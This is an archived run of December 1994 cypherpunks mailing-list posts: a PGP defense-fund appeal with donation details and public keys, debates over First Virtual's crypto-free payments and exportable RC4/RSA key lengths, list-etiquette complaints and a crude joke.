ideals which animated its creation, express your support with a contribution to this fund. * * * Here are the details: To send a check or money order by mail, make it payable, NOT to Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the check or money order to the following address: Philip Dubois 2305 Broadway Boulder, CO USA 80304 (Phone #: 303-444-3885) To send a wire transfer, your bank will need the following information: Bank: VectraBank Routing #: 107004365 Account #: 0113830 Account Name: "Philip L. Dubois, Attorney Trust Account" Now here's the neat bit. You can make a donation to the PZDF by Internet mail on your VISA or MasterCard. Worried about snoopers intercepting your e-mail? Don't worry -- use PGP. Simply compose a message in plain ASCII text giving the following: the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank name of your VISA or MasterCard; the name which appears on it; a tele- phone number at which you can be reached in case of problems; the card number; date of expiry; and, most important, the amount you wish to do- nate. (Make this last item as large as possible.) Then use PGP to en- crypt and ASCII-armor the message using Phil Dubois's public key, en- closed below. (You can also sign the message if you like.) E-mail the output file to Phil Dubois (dubois at csn.org). Please be sure to use a "Subject:" line reading something like "Phil Zimmermann Defense Fund" so he'll know to decrypt it right away. Bona fides: My relation to Phil Z. is that of a long-time user and advocate of PGP and a personal friend. For over a year I moderated the (no longer published) digest, Info-PGP, on the old lucpul.it.luc.edu site here at Loyola. I am in no way involved with the administration of the PZDF. I volunteer my time on its behalf. Phil Dubois is Phil Z.'s lawyer and lead counsel in the Customs case. He administers the PZDF. To obtain a copy of my public key (with which you can verify the signature on this doc), you have a number of options: - Use the copy which I will append below. - Send mail to me at hmiller at luc.edu with the "Subject:" line reading "send pubkey" - Get it by anon ftp at ftp://ftp.math.luc.edu/pub/hmiller/pubkey.hm - Obtain it from an Internet PGP keyserver machine such as pgp-public-keys at pgp.ai.mit.edu. Just send a mail message to this address with the "Subject:" field "GET hmiller". Other keyserver machines on the Net which accept the same message format (and automatically synchronize keyrings with each other every 10 minutes or so) include: pgp-public-keys at pgp.mit.edu pgp-public-keys at demon.co.uk pgp-public-keys at pgp.ox.ac.uk pgp-public-keys at ext221.sra.co.jp pgp-public-keys at kub.nl pgp-public-keys at pgp.iastate.edu pgp-public-keys at dsi.unimi.it pgp-public-keys at pgp.dhp.com You can verify my public key by calling me at 312-338-2689 (home) or 312-508-2727 (office) and letting me read you my key fingerprint ("pgp -kvc hmiller" after you have put my key on your pubring.pgp keyring). I include it also in my .sig, below, if that's good enough for you. You might also note that Phil Zimmermann has signed my public key. Hopefully he is Node #1 in your Web-of-Trust! His key is available on the net keyservers and in the 'keys.asc' file in the PGP distribution packages. Phil Dubois's pubkey can also be obtained from the keyservers, if you prefer that source to the text below, and from 'keys.asc'. Phil Z. has signed his key as well. Here is Phil Dubois's public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 mQCNAiyaTboAAAEEAL3DOizygcxAe6OyfcuMZh2XnyfqmLKFDAoX0/FJ4+d2frw8 5TuXc/k5qfDWi+AQCdJaNVT8jlg6bS0HD55gLoV+b6VZxzIpHWKqXncA9iudfZmR rtx4Es82n8pTBtxa7vcQPhCXfjfl+lOMrICkRuD/xB/9X1/XRbZ7C+AHeDONAAUR tCFQaGlsaXAgTC4gRHVib2lzIDxkdWJvaXNAY3NuLm9yZz6JAJUCBRAsw4TxZXmE uMepZt0BAT0OA/9IoCBZLFpF9lhV1+epBi49hykiHefRdQwbHmLa9kO0guepdkyF i8kqJLEqPEUIrRtiZVHiOLLwkTRrFHV7q9lAuETJMDIDifeV1O/TGVjMiIFGKOuN dzByyidjqdlPFtPZtFbzffi9BomTb8O3xm2cBomxxqsV82U3HDdAXaY5Xw== =5uit - -----END PGP PUBLIC KEY BLOCK----- Here is my (Hugh Miller's) public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAy7frrEAAAEEALzOAQt+eWHzXSDLRgJaQMQ7Uju1xrD9mXAZGAG1GmiTNjKl wK68qOXrwJvnH1BmGtg8GGv53nTeabltpn5crsQVFm+0623M56/T7SOeUBWxxoa0 vvqAA8sJ6ac1/MXY9KIgqxu8Mu6Qwf68C4OnwCbE7T71bi+fjdEdYC5Hk8UpAAUR tB1IdWdoIE1pbGxlciA8aG1pbGxlckBsdWMuZWR1PokAlQMFEC7ryVNleYS4x6lm 3QEBW6YD/2IOIZX9FOggNyemvPwM/EN86KW74ZGuYuTIfPCrvOMy8pFqfE33Bw93 UkyIDj1Yh/nDlclEOO/J0tyngPn2BD2vMtaKIGRhVjnoxQc3BfzdjJ2nnHoFzAjz 0MBxYthysmWYsyF8cQxST6LZLITKkf41dti8SVKYVRWIgkyub02HiQCVAwUQLt/F oNEdYC5Hk8UpAQHD1wP9GdN9OHAKkIRsHeHy0wsEkI4Emb/bHiU+W59Zw7NPWsWF 3WTT1z8GKNToQLUdysbbJuSSk3rD3F4SNGJ+KPjR4674pmEfCVVP8cQPXEl4a3Zs xSLWNI6rG3muUAfLdyZiFP08NthOVlP2h1aOLCqIgkjEYMfQNEgkefBRJd6JywI= =hWCA - -----END PGP PUBLIC KEY BLOCK----- * * * This campaign letter will be posted in a number of Usenet groups. I will also be turning it into a FAQ-formatted document, which will be posted monthly in the relevant groups and which will be available by anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ. If you come upon, or up with, any other ways in which we can help raise funds for Phil, drop me a line at hmiller at luc.edu and let me know, so that I can put it in the FAQ. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvFO3tEdYC5Hk8UpAQF6IwQAp3Ig71gGRj/dDGXDBdqj55uMQQsywhi2 pEzh0arfrRonqMX0UleysqYqjcUtm0rvbrXoYUy8a9vJzj4Wuyf1dQ6WyqBkcmOX z7RGtoLVxsfTjNNTrY0810SXx/yOMYtBW7mq+zNmqEykGFZTdfsVKFEyFw6AJ//B Ah+LQNb01Xo= =aW2m -----END PGP SIGNATURE----- -- Hugh Miller, Ph.D. Voice: 312-508-2727 Asst. Professor of Philosophy FAX: 312-508-2292 Loyola University Chicago Home: 312-338-2689 6525 N. Sheridan Rd. E-mail: hmiller at luc.edu Chicago, IL 60626 WWW: http://www.luc.edu/~hmiller PGP Public Key 4793C529: FC D2 08 BB 0C 6D CB C8 0B F9 BA 55 62 19 40 21 From nsb at nsb.fv.com Sat Dec 17 06:33:13 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 17 Dec 94 06:33:13 PST Subject: properties of FV In-Reply-To: <17932.787530924.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 Re: properties of FV Eric Hughes at remailer.net (3122) > > Use > > the crypto entirely for transit security. If someone hacks your > > machine and grabs your passphrase and forges a transaction, at least > > the intruder has to grab your passphrase. > This is exactly the way we would expect to use crypto layered on top of > First Virtual's protocols, if and when such cryptographic protocols are > deployed widely enough to have penetrated af meaningful portion of our > market. > "If and When" is Yes and Today. Anybody who can autosign their > outgoing mail can participate in this kind of transaction already. > Assuming the above agreement is made with respect to private keys, > there is _no_ risk to the customer about loss of secret keys, and no > greater risk to the merchant than what currently obtains. The risk analysis is absolutely true. However, I have the impression you missed the phrase "deployed widely enough to have penetrated a meaningful portion of our market". I suspect that the cypherbunks and www-buyinfo communities are not the best place to get a feel for the extent to which crypto is widely deployed. Pick some random other list or newsgroup, however, and I'll be surprised if you find 1% market penetration for crypto. From nsb at nsb.fv.com Sat Dec 17 06:45:52 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 17 Dec 94 06:45:52 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412171450.JAA28435@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Excerpts from fv: 16-Dec-94 Re: FV & PGP (was Re: First.. Mike Ellsworth at firewall. (1283*) > >Without cryptography how exactly are you going to protect my credit card > >numbers from sniffer-snoopers and crackers? Either you will send the > >credit card text in the clear, or it will be encrypted somehow. Or perhaps > >you will have customers call you over the phone to give you their credit > >card info? > I would also like to be convinced on this point. It seems that it's an > either/or. Either the info is in the clear, and thus vulnerable, or it's > encrypted, and safer. Once more, with feeling: It is NOT an either/or. In the First Virtual system, the credit card number NEVER GOES OVER THE NET AT ALL, which means that it doesn't go over the net in the clear AND it doesn't go over the net encrypted. Please check out info at fv.com or URL http://www.fv.com for more information. -- Nathaniel - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvL6qyoZzwIn1bdtAQHSsgGAnwFwtMriI+Ln2qOBGGj6qaOW8e9hdodB fR+SE5cjajZxS4n3QVS5gbI6R6KZkqu5 =KQOY -----END PGP SIGNATURE----- From ddt at lsd.com Sat Dec 17 07:41:04 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 17 Dec 94 07:41:04 PST Subject: MACPGP: developers? Message-ID: Could the folks currently working on the (new?) MacPGP implementation (any version, any country) please identify themselves to me in private email? I have some brief questions, and have not been able to raise Zig (nor do I want to bother Phil). Thanks! dave -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAitfCt4AAAEEANk+zWV0Z1tnxsJm25BAvH2NI68RbNOaumDofJgVUL9BePQI HNNbOdu4gAmhcEXMvFVwu3vju4nh9qnzz7lYpw5Yh6TcgVI+vb9OsljfAR+ibhDN j5ParKfwZ+mexOCAfrgdt1z71XLY588qxs70ha6u76dvxUsdw6HBOF9KrwDlAAUT tB1EYXZpZCBEZWwgVG9ydG8gPGRkdEBsc2QuY29tPg== =U20R -----END PGP PUBLIC KEY BLOCK----- From perry at imsi.com Sat Dec 17 08:26:40 1994 From: perry at imsi.com (Perry E. Metzger) Date: Sat, 17 Dec 94 08:26:40 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: <9412171626.AA03764@snark.imsi.com> Alan Bostick says: > SLIP connections, quality > Web browsers, and MIME-compliant email packages are the high end of Net > access today. Hardly. I was at a party last friday night where the host had a T1 into his home, and numerous workstations on the home network. That counts as "high end", I'd say. Running a router, firewall and a network of workstations does indeed require skill. However... > They demand either an investment of money (intelligently > spent) or an investment of effort to get the stuff up and running and to > get the know-how needed to do so. Given that you can get a SLIP account just as easily as a shell account (i.e. call a provider) and that terminal software is not notably simpler to configure than SLIP or PPP software (anyone who thinks otherwise should try explaining what "seven bits, even parity" or "vt100 emulation" means to a liberal arts major) I'd say that the arguments being made are specious. They are based on the conjectures of people who haven't tried, rather than on the experience of those who have. With a package like "Chameleon", getting a PPP connection going is a matter of typing in a phone number and a couple of other magic values to a pretty friendly on-screen form -- which is more or less the level of effort needed to get a terminal emulator up and running. It might be different effort -- and certain people like Tim who are set in their ways might think of the tiny difference as a huge barrier -- but its not a particularly large effort. As for the money, these programs are not notably more expensive than commercial terminal emulators. I'd say, in fact, that running via SLIP or PPP is a SMALLER investment in time and effort because for the naive user running native applications on their machine with the native help and windowing systems running is probably a much more comfortable situation than trying to run "elm" via a weird terminal emulator program. And yes, I've some experience at what the naive users are like. There are now boxes you can get from your local bookstore that contain everything you need -- software, online signup, etc -- to get a PPP or SLIP connection to the net. I'd say that the kvetching is all just plain wrong. Perry From perry at imsi.com Sat Dec 17 08:34:48 1994 From: perry at imsi.com (Perry E. Metzger) Date: Sat, 17 Dec 94 08:34:48 PST Subject: FV & PGP (was Re: First Virtual email security) In-Reply-To: <199412170212.VAA21903@bb.hks.net> Message-ID: <9412171634.AA03784@snark.imsi.com> Mike Ellsworth says: > James D. Wilson said: > >Without cryptography how exactly are you going to protect my credit card > >numbers from sniffer-snoopers and crackers? Either you will send the > >credit card text in the clear, or it will be encrypted somehow. Or perhaps > >you will have customers call you over the phone to give you their credit > >card info? > > I would also like to be convinced on this point. It seems that it's an > either/or. Either the info is in the clear, and thus vulnerable, or it's > encrypted, and safer. I'm not the biggest fan on earth of the way First Virtual is running things, but you could have the decency to read what they've said before making assumptions. The answer is simple -- they never put the credit card number over the wire at all, either encrypted or unencrypted. Go off and read their documents if you want to know how that works. Perry From hfinney at shell.portal.com Sat Dec 17 08:43:46 1994 From: hfinney at shell.portal.com (Hal) Date: Sat, 17 Dec 94 08:43:46 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412161933.LAA09366@largo.remailer.net> Message-ID: <199412171643.IAA29300@jobe.shell.portal.com> It is an interesting idea that the RSA actually helps with the RC4 decryption by letting them check a key guess. This would suggest, though, that RC4 alone would not be allowed, only RC4 plus RSA. If they allowed RC4 alone then unlimited-length RSA would not seem any worse since with RC4 alone you don't get the key-checking feature. Also, are there restrictions on the encryption exponent? A 1024 bit RSA with a small encryption exponent would be faster to check than a 512 bit RSA with an arbitrary 512 bit encryption exponent. So if this were the reason you might think they would put some restrictions on that. Hal From ddt at lsd.com Sat Dec 17 08:49:28 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 17 Dec 94 08:49:28 PST Subject: LIST: calmness Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Let me be brief so you can hit the "d" key quickly... :) Please don't go, Tim. You are a very valuable asset. Lurk if you must... Everybody: _please_ tone down the "language," and focus, focus, focus. Let's all try to be more diplomatic. There's value in diplomacy. Let's continue to discuss Netscape, but NICELY. They deserve some respect. Enough MIME stuff for now! MIME is nifty, but this is about Crypto. Reset brain to a low-emotion state, post calmly. Let it stew before sending. Keep this list alive, tend it like a garden. It's important. dave -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLvMNc6HBOF9KrwDlAQH7CgP+JQb/T7KG/pJdtAhS9XCYYQGLCiY3Ub0O hSudj0ji5TzwgACWJSMWJv+wmEFzoYIPlEEs3DJjC4LbSV4wz5lGN/3NDCUFc5iH 48wOArC3fTCKkdNJbCsczaDrl5+hdyY5zIwM+4YKF3SEdN0RDtWLiWQaQ56shN6j Kmw9TwBzbS4= =SanU -----END PGP SIGNATURE----- From jcorgan at netcom.com Sat Dec 17 09:21:05 1994 From: jcorgan at netcom.com (jcorgan at netcom.com) Date: Sat, 17 Dec 94 09:21:05 PST Subject: Decrypting PGP 1.0 files Message-ID: <199412171720.JAA00356@mail.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- I have recently uncovered some old conventionally encrypted files from back in '91, using PGP 1.0. I remember the passphrase; however, they won't decrypt and state that the passphrase is bad (this is using PGP 2.6.2.) It occurred to me that PGP used some different algorithm (Bass-O-Matic?) back then, and I don't think the current versions are backwardly compatible (but perhaps they should detect and warn the user that this is the case.) So, where could I get PGP 1.0? ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvMdrk1Diok8GKihAQGG0AQAoSGnMZP8kwPlBEfAuvPy0HKC2eXCOW2S RMCV8o9RBD2a7vH5BHVt0f4XWiAUyZ0aEpr+DF7/OCy7KaqFf+5GYZdD0TX8eeHN Zw2NcMF6SztjqQ85b0BshyEfXaOBiEjqszSpMCQ1V5FbEuETYhiTm94uJLChFjCx e7I5Zwklmq0= =Ipmy -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 17 10:27:10 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 17 Dec 94 10:27:10 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412171643.IAA29300@jobe.shell.portal.com> Message-ID: <199412171924.LAA10824@largo.remailer.net> From: Hal This would suggest, though, that RC4 alone would not be allowed, only RC4 plus RSA. Or perhaps RC4 at 32 bits. All these restrictions are key length dependent. If you have a smaller search space, you can spend more time examinining candidates. Also, are there restrictions on the encryption exponent? A 1024 bit RSA with a small encryption exponent would be faster to check than a 512 bit RSA with an arbitrary 512 bit encryption exponent. These are public key operations, remember. The public exponents are usually only a few bits long anyway, no matter what the modulus. Eric From jcorgan at netcom.com Sat Dec 17 10:45:07 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Sat, 17 Dec 94 10:45:07 PST Subject: Decrypting PGP 1.0 files Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >So, where could I get PGP 1.0? Thanks to those who responded, I found it at: ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp/1.0/pgp10.zip ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvMxNU1Diok8GKihAQFqAgQA1DEnHuoHYJ82D4qBpVfnnc4IqWawV1sF gS8UmEqqTy3cKZxdzHCbSIQfDGjPxUzakkCqEnOqQYP/3UGj+25cQ4lbqoJLg/Qr N71nEivQ59CyAiUOxkJgO3WVUvYXs4J99EghKNdvIP3tFbKpoeciN15UNWAuedkN 8sPSMweHS7I= =tQOB -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 17 10:48:28 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 17 Dec 94 10:48:28 PST Subject: properties of FV In-Reply-To: Message-ID: <199412171945.LAA10849@largo.remailer.net> From: Nathaniel Borenstein > "If and When" is Yes and Today. Anybody who can autosign their > outgoing mail can participate in this kind of transaction already. However, I have the impression you missed the phrase "deployed widely enough to have penetrated a meaningful portion of our market". The argument I see here is like this: "Not very many people have it, so we can't use it." Under this rule, FV shouldn't worry about support for smart front ends, because most people don't have them already. FV shouldn't try to deploy mechant software, because most people don't have it already. Now I know that you're not claiming any of these ridiculous things, that is, outside of cryptography. What I am suggesting is that FV _allow_, not require, the use of encryption. Your main concern with cryptography, it seemed, was theft of secret keys. As you agree, that concern can be disposed of. Now the reason not to use crypto rests on paucity of existing sites which use it. If FV were to _require_ crypto, there would be grounds for concern. Yet neither of us think that a crypto requirement is appropriate for the current FV mechanism. So why, then, will not FV lead for crypto rather than follow? It must not be the software integration. PGP-encrypted mail can be recognized by a regular expression and filtered if you want to preserve a single address, or even easier make another address. Raph Levien's premail will automatically encrypt mail for outgoing users, transparently. It must not be the licensing. Perfectly legal PGP can be had from Viacrypt, even for server applications as FV would need. It must not be for marketing. Offering merchants a system where the customers can undertake an effort to lower the merchants's fraud rates seems like nothing but a win. It might be for saving face. Having argued against crypto so publicly, changing positions so rapidly might be seen to look bad. So, I'm confused. What _is_ still the problem? Eric From cwalton at earthlink.net Sat Dec 17 11:07:14 1994 From: cwalton at earthlink.net (Conrad Walton) Date: Sat, 17 Dec 94 11:07:14 PST Subject: Religous Repression Message-ID: A while ago, I too was flamed on this list. PMO (pissed me off). I'm relativly new, having only been here a year and was afraid to post at first. After getting flamed by the likes of perry, lucky and the 'old gang', I too unsubscribed for a while. TCMAY was the one of the few with a voice of reason and rationality in the midst of the immature fire storm. You can tell there's too many college pukes on this list. Seems like any who dares to disagree with the "cpunkly correct" religion around here gets flamed. For all the talk about "freedom", "privacy", and "personal choice", there is is zero tolerance for difference of opinion on this list. I'm tired of this religious repression here. If you don't agree with the status quo, then you'll be flamed forever. (Maybe that's what the bible means by the Lake of Fire.....) I still subscribe, but I sure delete a lot of notes before reading them. You can be sure I will be doing that to the flame I expect back from this note. I was gonna write this a while back and figured it would do no good. It still won't, but I'll feel better. Tim wrote a note recently about civility and I was encouraged. Now, I'm just pissed. This doesn't apply to everyone, but screw all you intolerant, narrow minded bigots. There. I feel better now. ***************************************** Conrad Walton cwalton at earthlink.net ***************************************** Without JOY there can be no STRENGTH. Without STRENGTH, all other VIRTUES are worthless. Edward Abbey From asgaard at sos.sll.se Sat Dec 17 11:53:43 1994 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Sat, 17 Dec 94 11:53:43 PST Subject: Tim May the Luddite--His Last Message for A While In-Reply-To: <922.pfarrell@netcom.com> Message-ID: Pat Farrel wrote: > Cypherpunks will continue. I'm not so sure about the cypherpunks list. Without T.C. May, I'm not so sure either, unless somebody else could take up his role as inofficial moderator. In the past, whenever the list has gone astray, T.C.'s analytical posts have set things straight, calmed down flamers and defined the relevance of various topics (to the cp agenda). This kind of moderation, mostly set by example without annoying hardly anyone, is not so easy to do. Completely unmoderated (in this sense), the cp-list might become just another sci.crypt, talk.politics. crypto or alt.security.pgp. And without the visionary posts by T.C. May, the cp-list would be a lot poorer. Certainly, there are other frequent posters with visions, but T.C. May's long and deep penetration into the consequences of true anonymity or pseudonymity has yet to be equalled on the list. (Other verbal and experienced cp's, like Eric H., Perry M. and Hal F., among others, of course have their own sectors of expertize, no less vital or important.) Appendix: The recent boom in signed posts to the cp-list is uninteresting to me. If an argument is good I don't care if the pseudonymous identity (or true, in the sense of a physical identity matching the name in a fingerprint file or whatever) is forged. I would care if an impostor tried to give out disinformation in the name of, for example, Eric H. But I'm sure I would notice the difference. Amamda W.'s latest example of what MIME could be used for was interesting. The only thing that came through to me (Pine 3.91 on a Unix shell account over Ethernet to a Reflection for Windows client) was an underscored 'on' in red pixels. What a wonderful instrument for SHOUTING. Mats From anonymous-remailer at shell.portal.com Sat Dec 17 12:15:01 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 17 Dec 94 12:15:01 PST Subject: HUMOR: The Train Message-ID: <199412172014.MAA10944@jobe.shell.portal.com> The Train Author Unknown A few days after Christmas a mother was working in the kitchen, listening to her son playing with his new electric train in the living room. She heard the train stop and here son said, "All you sons of bitches who want off, get the hell off now 'cause this is the last stop And all you sons of bitches who are getting on, get your asses in the train 'cause we're leaving." The mother went in and told her son, "We don't use that kind of language in this house. Now, I want you to go to your room for two hours. When you come out, you may play with your train, but I want you to use nice language." Two hours later, the son comes out of the bedroom and resumes playing with his train. Soon the train stopped and the mother heard her son say, "All passengers who are disembarking the train, please remember to take all your belongings with you. We thank you for riding with us today and hope your trip was a pleasant one. We hope you will ride with us again soon." "For those of you just boarding, we ask you to stow all of your hand luggage under the seat. Remember there is no smoking except in the club car. We hope you will have a pleasant and relaxing journey with us today." "For those of you who are pissed off about the two hour delay, please see the bitch in the kitchen." From nsb at nsb.fv.com Sat Dec 17 12:57:17 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 17 Dec 94 12:57:17 PST Subject: properties of FV In-Reply-To: <21153.787690580.1@nsb.fv.com> Message-ID: Excerpts from fv: 17-Dec-94 Re: properties of FV eric at remailer.net (2015) > The argument I see here is like this: "Not very many people have it, > so we can't use it." Under this rule, FV shouldn't worry about > support for smart front ends, because most people don't have them > already. FV shouldn't try to deploy mechant software, because most > people don't have it already. Now I know that you're not claiming any > of these ridiculous things, that is, outside of cryptography. Interesting analogy. But there's a number of other tradeoffs here. The work involved for us in the case of a smart front end is relatively minimal -- whipping together a safe-tcl-based front end for metamail-enabled mail tools didn't take me very long at all, actually, and it makes for very sexy demos, which as you know is important to marketing types. (Ever tried giving a sexy demo of cryptography? It's sort of like demoing a new kernel. Ooh, how exciting.) So while I am certainly NOT claiming that sexy demos are more important than cryptographic freedom, it is simply true that there was a far larger perceived "bang for the buck" in building the sexy front end. And as for deploying merchant software, well, that IS clearly more essential than cryptography -- you simply can't have a commerce mechanism without sellers! The work involved in adding optional cryptography is much more than you might think, particularly because of our internal security architecture. Basically, without going into a lot of details, the FV crypto-engine would have to live on the non-Internet machines that are not in our direct control, and this would enormously complicate the limited (batch!) communication we facilitate between the Internet and non-Internet machines. Trust me, it isn't trivial by a long shot. That doesn't mean we won't do it, but it does affect our priorities. (It's interesting that in our case, security gets in the WAY of crypto, given the non-cryptographic security mechanisms we've already sete up!) > What I am suggesting is that FV _allow_, not require, the use of > encryption. Your main concern with cryptography, it seemed, was theft > of secret keys. As you agree, that concern can be disposed of. Now > the reason not to use crypto rests on paucity of existing sites which > use it. If FV were to _require_ crypto, there would be grounds for > concern. Yet neither of us think that a crypto requirement is > appropriate for the current FV mechanism. I think we're completely in sync here with regard to everything except the timing: we're a small company and we have to choose our priorities carefully. The crypto option is one we're very interested in adding eventually, but at this point it would be a major strain on our resources. Moreover, frankly, if we did it, that would only serve to mix our message in many peoples' perception. It's hard enough explaining to reporters that "we've discovered that crypto isn't needed for commerce." Their chance of understanding our message would NOT be enhanced if we then added "but we're providing crypto as an option anyway." At this early stage, we have to keep our publicity message as simple as possible. (In fact, I think it's already too complicated, so making it even more complicated is a very hard sell.) > So why, then, will not FV lead for crypto rather than follow? Well, mostly because we're leading for commerce, and we can't lead for everything. Trying to do too many things at once often causes you not to succed at any of them. We do, however, put our money where our mouth is when we say that we believe in the importance of universal access to cryptography -- that's why, even as a startup, we are a significant sponsor of Phil Zimmerman's ongoing work. (We paid for the development of a PGP-encrypted telnet, which will be publicly available soon if it isn't already, and we send monthly checks in support of work related to the development of PGP 3.0.) I think I could argue that this makes us more of a "leader for crypto" than most other companies in the world. We just don't want our belief in the importance of privacy, which is real, to become on obstacle to the success of our business plan, which does not require cryptography, and which in fact REQUIRES making people realize that crypto is not a prerequisite for commerce. > It might be for saving face. Having argued against crypto so > publicly, changing positions so rapidly might be seen to look bad. Heck, no. I will *enjoy* the day when we add cryptographic support, and as I hope I've made clear above, I won't regard this as "changing positions" at all. To be perfectly clear, our position is that crypto would be a valuable future enhancement to our system because it will enhance our users' privacy, not because it will enhance the system's security. We think the system is quite sufficiently secure today, without crypto. I am sorry if we have alienated some crypto-enthusiasts with our "crypto is not needed" argument, but this fact is critical to our business strategy. It is NOT the same as saying "crypto is bad". So if we've been unclear, let me try once more to be crystal clear: 1. Cryptography is a Good Thing. 2. Universal access to cryptography is critical to the future of human freedom. 3. First Virtual has discovered that cryptography is not NECESSARY for Internet commerce, and is trying to use that discovery to stimulate real commerce on the net and to grow our business. 4. Nearly every technology has positive and negative effects. If our discovery sets back the progress of freedom of cryptography, that was never our intent, and we recognize it as a NEGATIVE effect. Just because crypto isn't necessary for commerce doesn't mean it isn't vitally important to the future of humanity. 5. As a social responsible corporate citizen of the net, recognizing the special responsibilities that stem from our invention of crypto-free commerce, First Virtual is proud to sponsor ongoing PGP development, and is open to other opportunities (within our still-limited resources) to help promote the cause of free and universal access to cryptography. > So, I'm confused. What _is_ still the problem? Mostly that there's not enough hours in the day. (To give you an idea of how I spend MY time: In the 36 hour period that ended Saturday morning, during which I was briefly out of town, I received 760 email messages. No kidding. We're a tad busy these days....) The bottom line: First Virtual is not the enemy of cryptography. However, our invention is certainly cause for concern for those among us who thought that commerce would be the "killer app" for making cryptography universally available. We believe that on balance our invention is a very good thing, especially given its democratizing properties (anyone in the world can be a merchant, unlike standard credit cards). We want to work WITH the advocates of crypto to make sure that cryptography remains avialable for privacy, even though we have demonstrated that it isn't necessarily a prerequisite for commerce. -- Nathaniel From hfinney at shell.portal.com Sat Dec 17 12:58:30 1994 From: hfinney at shell.portal.com (Hal) Date: Sat, 17 Dec 94 12:58:30 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412171924.LAA10824@largo.remailer.net> Message-ID: <199412172058.MAA13081@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- eric at remailer.net (Eric Hughes) writes: > From: Hal > Also, are there restrictions on the encryption exponent? A 1024 bit RSA > with a small encryption exponent would be faster to check than a 512 bit > RSA with an arbitrary 512 bit encryption exponent. >These are public key operations, remember. The public exponents are >usually only a few bits long anyway, no matter what the modulus. That's what I mean. "Usually" they are, but that helps a snooper to check his guess. Maybe it would be wise when using limited-length session keys to use larger encryption exponents just to confound an exhaustive search of the session key space. I think it is surprising if there is no limitation on encryption exponent size for these exportable key systems, assuming that is the strategy the government is using. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvNQxRnMLJtOy9MBAQHXdAIAmvtcjZUXJF97vROjOFQK1DJ2jx44GhZq CkmETSb8nmkzJhRVDYyQ7aZgWKSOril2MQsTRkJ59DyLKGZY7qQ6oQ== =e06A -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Sat Dec 17 13:26:30 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sat, 17 Dec 94 13:26:30 PST Subject: properties of FV Message-ID: At 3:55 PM 12/17/94, Nathaniel Borenstein wrote: [...] >Well, mostly because we're leading for commerce, and we can't lead for >everything. Trying to do too many things at once often causes you not >to succed at any of them. We do, however, put our money where our mouth >is when we say that we believe in the importance of universal access to >cryptography -- that's why, even as a startup, we are a significant >sponsor of Phil Zimmerman's ongoing work. (We paid for the development >of a PGP-encrypted telnet, which will be publicly available soon if it >isn't already, and we send monthly checks in support of work related to >the development of PGP 3.0.) [...] >So if we've been unclear, let me try once more to be crystal clear: > >1. Cryptography is a Good Thing. > >2. Universal access to cryptography is critical to the future of human >freedom. Hmm. Does everyone that previously flamed the hell out of First Virtual feel kind of stupid now? Dont' get me wrong, I don't have anything wrong with discussing the limitations of First Virtuals protocols or software on the list, that's what the list is for. But it seems kind of counter productive to be viciously flaming people like First Virtual and Mosaic, especially when both have said that they remain committed to cryptography. Heck, if they hadn't said this, it would probably be even more important not to flame them, cause we'd want to convince them to change they're minds. And being rude rarely convinced anyone of anything. I'm just issuing a plea that people try to be a bit less rude on the list in the future, especially with Real Live Commercial Developers. Not that commercial developers are better then the rest of us, but I'm sure we all agree that it would be really nice if commercial software supported strong crypto, and it's really important to get commercial developers to do so. If some of them are listening in on the list, it seems a good opportunity to try to rationally and reasonably explain why crypto is good (if not neccesary, as FV claims), and what sorts of crypto are strong enough and well suited for their applications. Without calling them names. From hfinney at shell.portal.com Sat Dec 17 13:50:01 1994 From: hfinney at shell.portal.com (Hal) Date: Sat, 17 Dec 94 13:50:01 PST Subject: Time to exhaustively break 40-bit RC4? 